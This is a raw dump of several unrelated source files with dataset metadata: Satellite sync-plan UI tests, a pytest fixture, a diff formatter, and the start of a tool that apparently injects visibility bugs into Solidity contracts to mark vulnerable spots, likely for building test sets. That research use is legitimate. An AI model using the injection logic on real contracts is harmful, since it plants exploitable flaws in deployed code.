resource_id = {}'.format(repo_id),\n max_tries=max_tries\n )\n\n def validate_repo_content(self, repo, content_types, after_sync=True):\n \"\"\"Check whether corresponding content is present in repository before\n or after synchronization is performed\n\n :param repo: Repository entity instance to be validated\n :param content_types: List of repository content entities that\n should be validated (e.g. package, erratum, puppet_module)\n :param bool after_sync: Specify whether you perform validation before\n synchronization procedure is happened or after\n \"\"\"\n repo = repo.read()\n for content in content_types:\n if after_sync:\n self.assertIsNotNone(\n repo.last_sync, 'Repository unexpectedly was not synced.')\n self.assertGreater(\n repo.content_counts[content],\n 0,\n 'Repository contains invalid number of content entities.'\n )\n else:\n self.assertIsNone(\n repo.last_sync, 'Repository was unexpectedly synced.')\n self.assertFalse(\n repo.content_counts[content],\n 'Repository contains invalid number of content entities.'\n )\n\n def get_client_datetime(self, browser):\n \"\"\"Make Javascript call inside of browser session to get exact current\n date and time. In that way, we will be isolated from any issue that can\n happen due different environments where test automation code is\n executing and where browser session is opened. That should help us to\n have successful run for docker containers or separated virtual machines\n When calling .getMonth() you need to add +1 to display the correct\n month. Javascript count always starts at 0, so calling .getMonth() in\n May will return 4 and not 5.\n\n :param browser: Webdriver browser object.\n\n :return: Datetime object that contains data for current date and time\n on a client\n \"\"\"\n script = ('var currentdate = new Date(); return ({0} + \"-\" + {1} + '\n '\"-\" + {2} + \" : \" + {3} + \":\" + {4});').format(\n 'currentdate.getFullYear()',\n '(currentdate.getMonth()+1)',\n 'currentdate.getDate()',\n 'currentdate.getHours()',\n 'currentdate.getMinutes()',\n )\n client_datetime = browser.execute_script(script)\n return datetime.strptime(client_datetime, '%Y-%m-%d : %H:%M')\n\n @tier1\n def test_positive_create_with_name(self):\n \"\"\"Create Sync Plan with valid name values\n\n :id: ceb125a4-449a-4a86-a94f-2a28884e3a41\n\n :expectedresults: Sync Plan is created\n\n :CaseImportance: Critical\n \"\"\"\n with Session(self) as session:\n for name in generate_strings_list():\n with self.subTest(name):\n make_syncplan(\n session,\n org=self.organization.name,\n name=name,\n description=gen_string('utf8'),\n sync_interval=choice(valid_sync_intervals()),\n )\n self.assertIsNotNone(self.syncplan.search(name))\n\n @tier1\n def test_positive_create_with_description(self):\n \"\"\"Create Sync Plan with valid desc values\n\n :id: 6ccd2229-dcc3-4090-9ec9-84fea837c50c\n\n :expectedresults: Sync Plan is created\n\n :CaseImportance: Critical\n \"\"\"\n with Session(self) as session:\n for desc in generate_strings_list():\n with self.subTest(desc):\n name = gen_string('utf8')\n make_syncplan(\n session,\n org=self.organization.name,\n name=name,\n description=desc,\n sync_interval=choice(valid_sync_intervals()),\n )\n self.assertIsNotNone(self.syncplan.search(name))\n\n @tier1\n def test_positive_create_with_sync_interval(self):\n \"\"\"Create Sync Plan with valid sync intervals\n\n :id: 8916285a-c8d2-415a-b694-c32727e93ac0\n\n :expectedresults: Sync Plan is created\n\n :CaseImportance: Critical\n \"\"\"\n with Session(self) as session:\n for interval in valid_sync_intervals():\n with self.subTest(interval):\n name = gen_string('alphanumeric')\n make_syncplan(\n session,\n org=self.organization.name,\n name=name,\n description=name,\n sync_interval=interval,\n )\n self.assertIsNotNone(self.syncplan.search(name))\n\n @tier1\n def test_negative_create_with_invalid_name(self):\n \"\"\"Create Sync Plan with invalid names\n\n :id: 64724669-0289-4e8a-a44d-eb47e094ef18\n\n :expectedresults: Sync Plan is not created\n\n :CaseImportance: Critical\n \"\"\"\n with Session(self) as session:\n for name in invalid_values_list(interface='ui'):\n with self.subTest(name):\n make_syncplan(\n session,\n org=self.organization.name,\n name=name,\n description='invalid name',\n )\n self.assertIsNotNone(self.syncplan.wait_until_element(\n common_locators['common_invalid']))\n\n @tier1\n def test_negative_create_with_same_name(self):\n \"\"\"Create Sync Plan with an existing name\n\n :id: 6d042f9b-82f2-4795-aa48-4603c1698aaa\n\n :expectedresults: Sync Plan cannot be created with existing name\n\n :CaseImportance: Critical\n \"\"\"\n name = gen_string('alphanumeric')\n with Session(self) as session:\n make_syncplan(session, org=self.organization.name, name=name)\n self.assertIsNotNone(self.syncplan.search(name))\n make_syncplan(\n session,\n org=self.organization.name,\n name=name,\n description='with same name',\n )\n self.assertIsNotNone(self.syncplan.wait_until_element(\n common_locators['common_invalid']))\n\n @tier1\n @upgrade\n def test_positive_search_scoped(self):\n \"\"\"Test scoped search for different sync plan parameters\n\n :id: 3a48513e-205d-47a3-978e-79b764cc74d9\n\n :customerscenario: true\n\n :expectedresults: Proper Sync Plan is found\n\n :BZ: 1259374\n\n :CaseImportance: High\n \"\"\"\n name = gen_string('alpha')\n start_date = datetime.utcnow() + timedelta(days=10)\n entities.SyncPlan(\n name=name,\n interval=SYNC_INTERVAL['day'],\n organization=self.organization,\n enabled=True,\n sync_date=start_date,\n ).create()\n with Session(self) as session:\n session.nav.go_to_select_org(self.organization.name)\n for query_type, query_value in [\n ('interval', SYNC_INTERVAL['day']),\n ('enabled', 'true'),\n ]:\n self.assertIsNotNone(\n self.syncplan.search(\n name,\n _raw_query='{} = {}'.format(query_type, query_value)\n )\n )\n\n @skip_if_bug_open('bugzilla', 1460146)\n @tier1\n def test_positive_update_name(self):\n \"\"\"Update Sync plan's name\n\n :id: 6b22468f-6abc-4a63-b283-28c7816a5e86\n\n :expectedresults: Sync Plan's name is updated\n\n :BZ: 1460146\n\n :CaseImportance: Critical\n \"\"\"\n plan_name = gen_string('alpha')\n entities.SyncPlan(\n name=plan_name,\n interval=SYNC_INTERVAL['day'],\n organization=self.organization,\n ).create()\n with Session(self) as session:\n session.nav.go_to_select_org(self.organization.name)\n for new_plan_name in generate_strings_list():\n with self.subTest(new_plan_name):\n self.syncplan.update(plan_name, new_name=new_plan_name)\n self.assertIsNotNone(self.syncplan.search(new_plan_name))\n plan_name = new_plan_name # for next iteration\n\n @skip_if_bug_open('bugzilla', 1460146)\n @tier1\n @upgrade\n def test_positive_update_interval(self):\n \"\"\"Update Sync plan's interval\n\n :id: 35820efd-099e-45dd-8298-77d5f35c26db\n\n :expectedresults: Sync Plan's interval is updated and no error raised\n\n :BZ: 1460146, 1387543\n\n :CaseImportance: Critical\n \"\"\"\n name = gen_string('alpha')\n start_date = datetime.utcnow() + timedelta(days=1)\n entities.SyncPlan(\n name=name,\n interval=SYNC_INTERVAL['day'],\n organization=self.organization,\n enabled=True,\n sync_date=start_date,\n ).create()\n with Session(self) as session:\n session.nav.go_to_select_org(self.organization.name)\n for new_interval in valid_sync_intervals():\n with self.subTest(new_interval):\n self.syncplan.update(name, new_sync_interval=new_interval)\n self.assertIsNone(self.user.wait_until_element(\n common_locators['haserror'], timeout=3))\n self.syncplan.click(self.syncplan.search(name))\n # Assert updated sync interval\n interval_text = self.syncplan.wait_until_element(\n locators['sp.fetch_interval']).text\n self.assertEqual(interval_text, new_interval)\n # Assert that start date was not changed after interval\n # changed\n startdate_text = self.syncplan.wait_until_element(\n locators['sp.fetch_startdate']).text\n self.assertNotEqual(startdate_text, 'Invalid Date')\n self.assertIn(\n start_date.strftime(\"%Y/%m/%d\"), startdate_text)\n\n @tier2\n def test_positive_update_product(self):\n \"\"\"Update Sync plan and associate products\n\n :id: 19bdb36a-ed2a-4bbb-9d8d-9ad9f6a800a2\n\n :expectedresults: Sync Plan has the associated product\n\n :CaseLevel: Integration\n \"\"\"\n strategy, value = locators['sp.prd_select']\n product = entities.Product(organization=self.organization).create()\n plan_name = gen_string('alpha')\n entities.SyncPlan(\n name=plan_name,\n interval=SYNC_INTERVAL['week'],\n organization=self.organization,\n ).create()\n with Session(self) as session:\n session.nav.go_to_select_org(self.organization.name)\n self.syncplan.update(\n plan_name, add_products=[product.name])\n self.syncplan.click(self.syncplan.search(plan_name))\n # Assert product is associated with sync plan\n self.syncplan.click(tab_locators['sp.tab_products'])\n element = self.syncplan.wait_until_element(\n (strategy, value % product.name))\n self.assertIsNotNone(element)\n\n @tier2\n @upgrade\n def test_positive_update_and_disassociate_product(self):\n \"\"\"Update Sync plan and disassociate products\n\n :id: 860bd88e-a425-4218-b02c-64402ee8af9d\n\n :expectedresults: Sync Plan does not have the associated product\n\n :CaseLevel: Integration\n \"\"\"\n plan_name = gen_string('utf8')\n strategy, value = locators['sp.prd_select']\n product = entities.Product(organization=self.organization).create()\n entities.SyncPlan(\n name=plan_name,\n interval=SYNC_INTERVAL['week'],\n organization=self.organization,\n ).create()\n with Session(self) as session:\n session.nav.go_to_select_org(self.organization.name)\n self.syncplan.update(plan_name, add_products=[product.name])\n self.syncplan.click(self.syncplan.search(plan_name))\n self.syncplan.click(tab_locators['sp.tab_products'])\n element = self.syncplan.wait_until_element(\n (strategy, value % product.name))\n self.assertIsNotNone(element)\n # Disassociate the product from sync plan and the selected product\n # should automatically move from 'List/Remove` tab to 'Add' tab\n self.syncplan.update(plan_name, rm_products=[product.name])\n self.syncplan.click(self.syncplan.search(plan_name))\n self.syncplan.click(tab_locators['sp.tab_products'])\n self.syncplan.click(tab_locators['sp.add_prd'])\n element = self.syncplan.wait_until_element(\n (strategy, value % product.name))\n self.assertIsNotNone(element)\n\n @tier1\n @upgrade\n def test_positive_delete(self):\n \"\"\"Delete an existing Sync plan\n\n :id: 81beec05-e38c-48bc-8f01-10cb1e10a3f6\n\n :expectedresults: Sync Plan is deleted successfully\n\n :CaseImportance: Critical\n \"\"\"\n with Session(self) as session:\n for plan_name in generate_strings_list():\n with self.subTest(plan_name):\n entities.SyncPlan(\n name=plan_name,\n interval=SYNC_INTERVAL['day'],\n organization=self.organization,\n ).create()\n session.nav.go_to_select_org(self.organization.name)\n self.syncplan.delete(plan_name)\n\n @run_only_on('sat')\n @stubbed()\n @tier2\n def test_positive_create_ostree_sync_plan(self):\n \"\"\"Create a sync plan for ostree contents.\n\n :id: bf01f23f-ba55-4c88-baad-85603fce57a4\n\n :expectedresults: sync plan should be created successfully\n\n :caseautomation: notautomated\n\n :CaseLevel: Integration\n \"\"\"\n\n @tier4\n def test_negative_synchronize_custom_product_past_sync_date(self):\n \"\"\"Verify product won't get synced immediately after adding association\n with a sync plan which has already been started\n\n :id: b56fccb9-8f84-4676-a777-b3c6458c909e\n\n :expectedresults: Repository was not synchronized\n\n :BZ: 1279539\n\n :CaseLevel: System\n \"\"\"\n plan_name = gen_string('alpha')\n product = entities.Product(organization=self.organization).create()\n repo = entities.Repository(product=product).create()\n with Session(self) as session:\n startdate = self.get_client_datetime(session.browser)\n make_syncplan(\n session,\n org=self.organization.name,\n name=plan_name,\n startdate=startdate.strftime('%Y-%m-%d'),\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n )\n self.syncplan.update(\n plan_name, add_products=[product.name])\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n max_attempts=5,\n )\n\n @tier4\n def test_positive_synchronize_custom_product_past_sync_date(self):\n \"\"\"Create a sync plan with past datetime as a sync date, add a\n custom product and verify the product gets synchronized on the next\n sync occurrence\n\n :id: d65e91c4-a0b6-4588-a3ff-fe9cd3762556\n\n :expectedresults: Product is synchronized successfully.\n\n :BZ: 1279539\n\n :CaseLevel: System\n \"\"\"\n interval = 60 * 60 # 'hourly' sync interval in seconds\n delay = 5 * 60\n plan_name = gen_string('alpha')\n product = entities.Product(organization=self.organization).create()\n repo = entities.Repository(product=product).create()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n - timedelta(seconds=(interval - delay)))\n make_syncplan(\n session,\n org=self.organization.name,\n name=plan_name,\n description='sync plan create with start time',\n startdate=startdate.strftime('%Y-%m-%d'),\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n sync_interval='hourly',\n )\n # Associate sync plan with product\n self.syncplan.update(\n plan_name, add_products=[product.name])\n # Verify product has not been synced yet\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/4, product.name))\n sleep(delay/4)\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait until the next recurrence\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay, product.name))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @tier4\n def test_positive_synchronize_custom_product_future_sync_date(self):\n \"\"\"Create a sync plan with sync date in a future and sync one custom\n product with it automatically.\n\n :id: fdd3b2a2-8d8e-4a18-b6a5-363e8dd5f998\n\n :expectedresults: Product is synchronized successfully.\n\n :CaseLevel: System\n \"\"\"\n delay = 5 * 60 # delay for sync date in seconds\n plan_name = gen_string('alpha')\n product = entities.Product(organization=self.organization).create()\n repo = entities.Repository(product=product).create()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n + timedelta(seconds=delay))\n make_syncplan(\n session,\n org=self.organization.name,\n name=plan_name,\n description='sync plan create with start time',\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n )\n # Verify product is not synced and doesn't have any content\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Associate sync plan with product\n self.syncplan.update(plan_name, add_products=[product.name])\n # Wait half of expected time\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/2, product.name))\n sleep(delay / 4)\n # Verify product has not been synced yet\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait the rest of expected time\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay/2, product.name))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @tier4\n def test_positive_synchronize_custom_products_future_sync_date(self):\n \"\"\"Create a sync plan with sync date in a future and sync multiple\n custom products with multiple repos automatically.\n\n :id: 9564e726-59c6-4d24-bb3d-f0ab3c4b26a5\n\n :expectedresults: Products are synchronized successfully.\n\n :CaseLevel: System\n \"\"\"\n delay = 5 * 60 # delay for sync date in seconds\n plan_name = gen_string('alpha')\n products = [\n entities.Product(organization=self.organization).create()\n for _ in range(3)\n ]\n repos = [\n entities.Repository(product=product).create()\n for product in products\n for _ in range(2)\n ]\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n + timedelta(seconds=delay))\n make_syncplan(\n session,\n org=self.organization.name,\n name=plan_name,\n description='sync plan create with start time',\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n )\n # Verify products have not been synced yet\n for repo in repos:\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n # Associate sync plan with products\n self.syncplan.update(\n plan_name, add_products=[product.name for product in products])\n # Wait third part of expected time, because it will take a while to\n # verify each product and repository\n self.logger.info('Waiting {0} seconds to check products'\n ' were not synced'.format(delay/3))\n sleep(delay / 4)\n # Verify products has not been synced yet\n for repo in repos:\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n # Wait the rest of expected time\n self.logger.info('Waiting {0} seconds to check products'\n ' were synced'.format(delay*2/3))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n for repo in repos:\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @run_in_one_thread\n @tier4\n def test_positive_synchronize_rh_product_past_sync_date(self):\n \"\"\"Create a sync plan with past datetime as a sync date, add a\n RH product and verify the product gets synchronized on the next sync\n occurrence\n\n :id: 73a456fb-ad17-4921-b57c-27fc8e432a83\n\n :expectedresults: Product is synchronized successfully.\n\n :BZ: 1279539\n\n :CaseLevel: System\n \"\"\"\n interval = 60 * 60 # 'hourly' sync interval in seconds\n delay = 5 * 60\n plan_name = gen_string('alpha')\n org = entities.Organization().create()\n with manifests.clone() as manifest:\n entities.Subscription().upload(\n data={'organization_id': org.id},\n files={'content': manifest.content},\n )\n repo_id = enable_rhrepo_and_fetchid(\n basearch='x86_64',\n org_id=org.id,\n product=PRDS['rhel'],\n repo=REPOS['rhst7']['name'],\n reposet=REPOSET['rhst7'],\n releasever=None,\n )\n repo = entities.Repository(id=repo_id).read()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n - timedelta(seconds=(interval - delay)))\n make_syncplan(\n session,\n org=org.name,\n name=plan_name,\n description='sync plan create with start time',\n interval=u'hourly',\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n )\n # Associate sync plan with product\n self.syncplan.update(\n plan_name, add_products=[PRDS['rhel']])\n # Verify product has not been synced yet\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/4, PRDS['rhel']))\n sleep(delay/4)\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait until the first recurrence\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay, PRDS['rhel']))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @run_in_one_thread\n @tier4\n @upgrade\n def test_positive_synchronize_rh_product_future_sync_date(self):\n \"\"\"Create a sync plan with sync date in a future and sync one RH\n product with it automatically.\n\n :id: 193d0159-d4a7-4f50-b037-7289f4576ade\n\n :expectedresults: Product is synchronized successfully.\n\n :CaseLevel: System\n \"\"\"\n delay = 5 * 60 # delay for sync date in seconds\n plan_name = gen_string('alpha')\n org = entities.Organization().create()\n with manifests.clone() as manifest:\n entities.Subscription().upload(\n data={'organization_id': org.id},\n files={'content': manifest.content},\n )\n repo_id = enable_rhrepo_and_fetchid(\n basearch='x86_64',\n org_id=org.id,\n product=PRDS['rhel'],\n repo=REPOS['rhst7']['name'],\n reposet=REPOSET['rhst7'],\n releasever=None,\n )\n repo = entities.Repository(id=repo_id).read()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n + timedelta(seconds=delay))\n make_syncplan(\n session,\n org=org.name,\n name=plan_name,\n description='sync plan create with start time',\n interval=u'hourly',\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n )\n # Associate sync plan with product\n self.syncplan.update(\n plan_name, add_products=[PRDS['rhel']])\n # Wait half of expected time\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/2, PRDS['rhel']))\n sleep(delay / 4)\n # Verify product has not been synced yet\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait the rest of expected time\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay/2, PRDS['rhel']))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @tier3\n def test_positive_synchronize_custom_product_daily_recurrence(self):\n \"\"\"Create a daily sync plan with past datetime as a sync date,\n add a custom product and verify the product gets synchronized\n on the next sync occurrence\n\n :id: c29b99d5-b032-4e70-bb6d-c86f807e6adb\n\n :expectedresults: Product is synchronized successfully.\n\n :CaseLevel: System\n \"\"\"\n delay = 5 * 60\n plan_name = gen_string('alpha')\n product = entities.Product(organization=self.organization).create()\n repo = entities.Repository(product=product).create()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n - timedelta(days=1) + timedelta(seconds=delay))\n make_syncplan(\n session,\n org=self.organization.name,\n name=plan_name,\n description='sync plan create with start time',\n startdate=startdate.strftime('%Y-%m-%d'),\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n sync_interval='daily',\n )\n # Associate sync plan with product\n self.syncplan.update(\n plan_name, add_products=[product.name])\n # Verify product has not been synced yet\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/4, product.name))\n sleep(delay/4)\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait until the next recurrence\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay, product.name))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n\n @skip_if_bug_open('bugzilla', '1396647')\n @skip_if_bug_open('bugzilla', '1460146')\n @tier3\n def test_positive_synchronize_custom_product_weekly_recurrence(self):\n \"\"\"Create a daily sync plan with past datetime as a sync date,\n add a custom product and verify the product gets synchronized\n on the next sync occurrence\n\n :id: eb92b785-384a-4d0d-b8c2-6c900ed8b87e\n\n :expectedresults: Product is synchronized successfully.\n\n :BZ: 1396647, 1498793\n\n :CaseLevel: System\n \"\"\"\n delay = 5 * 60\n plan_name = gen_string('alpha')\n product = entities.Product(organization=self.organization).create()\n repo = entities.Repository(product=product).create()\n with Session(self) as session:\n startdate = (self.get_client_datetime(session.browser)\n - timedelta(weeks=1) + timedelta(seconds=delay))\n make_syncplan(\n session,\n org=self.organization.name,\n name=plan_name,\n description='sync plan create with start time',\n startdate=startdate.strftime('%Y-%m-%d'),\n start_hour=startdate.strftime('%H'),\n start_minute=startdate.strftime('%M'),\n sync_interval='weekly',\n )\n # Associate sync plan with product\n self.syncplan.update(\n plan_name, add_products=[product.name])\n # Verify product has not been synced yet\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was not synced'.format(delay/4, product.name))\n sleep(delay/4)\n with self.assertRaises(AssertionError):\n self.validate_task_status(repo.id, max_tries=2)\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n after_sync=False,\n )\n # Wait until the next recurrence\n self.logger.info('Waiting {0} seconds to check product {1}'\n ' was synced'.format(delay, product.name))\n sleep(delay * 3/4)\n # Verify product was synced successfully\n self.validate_task_status(repo.id,\n repo_backend_id=repo.backend_identifier\n )\n self.validate_repo_content(\n repo,\n ['erratum', 'package', 'package_group'],\n )\n","repo_name":"sghai/robottelo","sub_path":"tests/foreman/ui/test_syncplan.py","file_name":"test_syncplan.py","file_ext":"py","file_size_in_byte":36495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"73885925494","text":"from pytest import fixture\nfrom util import Env\n\n\n@fixture(scope=\"module\",\n params=('1.6', '1.7', '1.8'),\n ids=('target=1.6', 'target=1.7', 'target=1.8'))\ndef all_java_targets(request):\n Env['target'] = request.param\n return request.param\n","repo_name":"avekceeb/jvm-test-demo","sub_path":"fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31949173526","text":"import os.path\nfrom typing import Union\n\n\ndef get_value(items: dict, key: str):\n value = items[key]\n\n if type(value) is bool:\n if value is True:\n return 'true'\n return 'false'\n\n elif value is None:\n return 'null'\n\n return value\n\n\ndef get_normolize_value(value):\n if isinstance(value, dict):\n return '[complex value]'\n\n elif value in ('true', 'false', 'null', 0):\n return value\n\n return f\"'{value}'\"\n\n\ndef make_message(ancestry, type, value: Union[any, list]):\n ancestry = \".\".join(ancestry.split(\"/\"))\n common_part = f\"Property '{ancestry}' was\"\n\n if type == 'changed':\n value1, value2 = value\n value1 = get_normolize_value(value1)\n value2 = get_normolize_value(value2)\n message = f'{common_part} updated. From {value1} to {value2}'\n return message\n\n value = get_normolize_value(value)\n\n if type == 'added':\n message = f'{common_part} added with value: {value}'\n return message\n\n elif type == 'deleted':\n message = f'{common_part} removed'\n return message\n\n\ndef plain(tree: list):\n diff = tree['children']\n formatted_diff = []\n\n def walk(diff, ancestry):\n for internal_view in diff:\n\n type = get_value(internal_view, 'type')\n key = get_value(internal_view, 'key')\n cur_ancestry = os.path.join(ancestry, key)\n\n if type == 'nested':\n children = get_value(internal_view, 'children')\n walk(children, cur_ancestry)\n\n elif type == 'changed':\n values = [\n get_value(internal_view, 'value1'),\n get_value(internal_view, 'value2')\n ]\n\n formatted_diff.append(\n make_message(cur_ancestry, type, values)\n )\n\n elif type in ('added', 'deleted'):\n value = get_value(internal_view, 'value')\n formatted_diff.append(\n make_message(cur_ancestry, type, value)\n )\n\n walk(diff, '')\n\n result = '\\n'.join(formatted_diff)\n\n return result\n","repo_name":"Utrian/generate_the_diff","sub_path":"gendiff/formatters/plain.py","file_name":"plain.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"46820018074","text":"#!/usr/bin/pythin\n#-*- coding: utf-8 -*-\n\nimport json\nimport os\nfrom colorPrint import *\t#该头文件中定义了色彩显示的信息\nimport re\nimport subprocess\nimport copy\n\n#缓存路径\nCACHE_PATH = \"./cache/\"\n#注入所需信息存储路径\nINJECT_INFO_PATH = \"./injectInfo/\"\n#注入信息源代码键值\nSRC_KEY = \"srcPos\"\n#外部可见性标志\nEXTERNAL_FLAG = \"external\"\n#公共可见性标志\nPUBLIC_FLAG = \"public\"\n#变量声明标志(执行替换)\nREPLACE_VISIBILITY_FLAG = \"replaceVisibility\"\n#bug记录标志(执行后续标记)\nLABEL_BUG_FLAG = \"labelBug\"\n#构造函数标志\nCONSTRUCTOR_FLAG = \"constructor\"\n\nclass judgeAst:\n\tdef __init__(self, _json, _sourceCode, _filename):\n\t\tself.cacheContractPath = \"./cache/temp.sol\"\n\t\tself.cacheFolder = \"./cache/\"\n\t\tself.json = _json\n\t\tself.filename = _filename\n\t\tself.sourceCode = _sourceCode\n\n\tdef run(self):\n\t\tinjectInfo = dict()\n\t\tinjectInfo[SRC_KEY] = list()\n\t\t#1. 捕捉所有的external和public函数\n\t\ttargetFuncAstList = list()\n\t\tfor func in self.findASTNode(self.json, \"name\", \"FunctionDefinition\"):\n\t\t\tif (func[\"attributes\"][\"visibility\"] == EXTERNAL_FLAG or func[\"attributes\"][\"visibility\"] == PUBLIC_FLAG) and func[\"attributes\"][\"implemented\"] == True:\n\t\t\t\t#找到,外部可见性和公共可见性函数\n\t\t\t\t#进入到函数中,找到对函数变量的修改语句\n\t\t\t\t#要求函数不能是构造函数\n\t\t\t\tif func[\"attributes\"][\"kind\"] != CONSTRUCTOR_FLAG:\n\t\t\t\t\ttargetFuncAstList.append(func)\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tcontinue\n\t\t#2. 收集所有的状态变量的id和声明位置\n\t\tstateVarList = list()\n\t\tfor var in self.findASTNode(self.json, \"name\", \"VariableDeclaration\"):\n\t\t\tif var[\"attributes\"][\"stateVariable\"] == True:\n\t\t\t\tstartPos, endPos = self.srcToPos(var[\"src\"])\n\t\t\t\tstateVarList.append([var[\"id\"], startPos, endPos])\n\t\t\telse:\n\t\t\t\tcontinue\n\t\t#[bug fix] 查看所有的状态变量,如果该变量在任意时刻的类型是外部的,那么就应该剔除该变量\n\t\texternalPattern = re.compile(r\"(\\b)(external)(\\b)\")\n\t\ttemp = copy.deepcopy(stateVarList)\n\t\tfor item in temp:\n\t\t\t#首先获得所有的访问\n\t\t\taccessVarList = self.findASTNode(self.json, \"referencedDeclaration\", item[0])\n\t\t\t#然后进入到每个访问的类型中,查看有无external标志\n\t\t\tfor accessVar in accessVarList:\n\t\t\t\tvarType = accessVar[\"type\"]\n\t\t\t\tif externalPattern.search(varType):\n\t\t\t\t\t#存在,移除本目标\n\t\t\t\t\tstateVarList.remove(item)\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t#3. 然后进入到每个函数中,找寻有无对状态变量的访问操作 \n\t\tfor func in targetFuncAstList:\n\t\t\tfor var in stateVarList:\n\t\t\t\taccessVarList = self.findASTNodeAttr(func, \"referencedDeclaration\", var[0])\n\t\t\t\tif not accessVarList:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\t#print(var[0] == 2963)\n\t\t\t\t\t#找到了,分语句记录表达式位置 \n\t\t\t\t\t#首先记录变量声明的位置\n\t\t\t\t\tinjectInfo[SRC_KEY].append([var[1], var[2], REPLACE_VISIBILITY_FLAG])\n\t\t\t\t\t#然后进入到每个变量访问位置,找到最后的换行福,标记bug\n\t\t\t\t\tfor var in accessVarList:\n\t\t\t\t\t\t_, varEpos = self.srcToPos(var[\"src\"])\n\t\t\t\t\t\t#根据变量的访问位置,向后找到换行符号\n\t\t\t\t\t\twhile self.sourceCode[varEpos] != \"\\n\":\n\t\t\t\t\t\t\tvarEpos += 1\n\t\t\t\t\t\t#记录\n\t\t\t\t\t\tinjectInfo[SRC_KEY].append([varEpos, varEpos, LABEL_BUG_FLAG])\n\t\t#4. 去重,复合元素类型没办法set\n\t\ttemp = copy.deepcopy(injectInfo[SRC_KEY])\n\t\tinjectInfo[SRC_KEY].clear()\n\t\tfor item in temp:\n\t\t\tif item not in 